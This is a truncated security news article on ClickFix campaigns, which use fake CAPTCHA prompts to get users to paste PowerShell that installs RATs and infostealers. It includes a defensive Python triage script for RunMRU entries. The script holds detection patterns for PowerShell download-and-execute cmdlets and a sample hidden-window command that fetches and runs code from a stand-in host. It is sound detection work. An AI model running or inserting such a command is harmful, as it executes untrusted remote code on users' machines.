Cybercriminals Leverage ClickFix Strategy to Deploy RATs and Data-Stealing Malware
gbhackers
Cybercriminals are increasingly exploiting a deceptive social engineering technique known as ClickFix to initiate multi-stage cyberattacks, delivering remote access trojans (RATs) and data-stealing malware with alarming efficiency.
First identified in March 2024, ClickFix manipulates users into executing malicious PowerShell commands by disguising them as routine prompts like CAPTCHA verifications or browser updates.

Fake captcha
By leveraging human psychology and “verification fatigue,” attackers trick users into copying and pasting these commands into their system’s Run dialog, bypassing traditional security measures.
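Commands typed or pasted into the Run dialog are recorded per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which gives responders a place to look for this paste-and-run step. The following triage sketch is an added example, not code from the article or from Elastic Security Labs; the indicator patterns, the threshold and the sample values are assumptions constructed for illustration.

```python
import re

# Heuristic indicators: assumptions for this example, not taken from the
# Elastic report. Tune them against your own environment.
INDICATORS = {
    "powershell": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w\w*\s+(hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"(?<!\S)-e\w*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url": re.compile(r"https?://", re.I),
}

# Constructed sample of exported RunMRU values (value name -> data).
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "cmd\\1",
    "b": "powershell Get-Date\\1",
    "c": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.txt)"\\1',
}

def parse_runmru(values):
    """Return Run dialog commands, most recent first, from RunMRU value data."""
    order = values.get("MRUList", "")
    names = list(order) + sorted(k for k in values if k != "MRUList" and k not in order)
    # Each entry is stored with a trailing "\1" marker that is not part of the command.
    return [values[n].removesuffix("\\1") for n in names if n in values]

def triage(values, threshold=3):
    """Flag PowerShell commands that match at least `threshold` indicators."""
    findings = []
    for cmd in parse_runmru(values):
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        # Require PowerShell itself plus corroborating signs, to limit false positives.
        if "powershell" in hits and len(hits) >= threshold:
            findings.append((cmd, hits))
    return findings

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS {hits}: {cmd}")
```

A hit here is a lead for follow-up in process-creation and network telemetry, not proof of compromise, and an empty RunMRU does not rule the technique out because the history can be cleared.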
Social Engineering as the Entry Point
Elastic Security Labs reports a significant surge in ClickFix campaigns throughout 2024 and into 2025, with a notable increase in activity during Q1 2025, targeting a wide range of victims with malware like LUMMA, ARECHCLIENT2 (also known as SectopRAT), and the GHOSTPULSE loader.
A recent ClickFix campaign analyzed by Elastic Security Labs reveals a meticulously crafted infection process.
The ...
Copyright of this story solely belongs to gbhackers.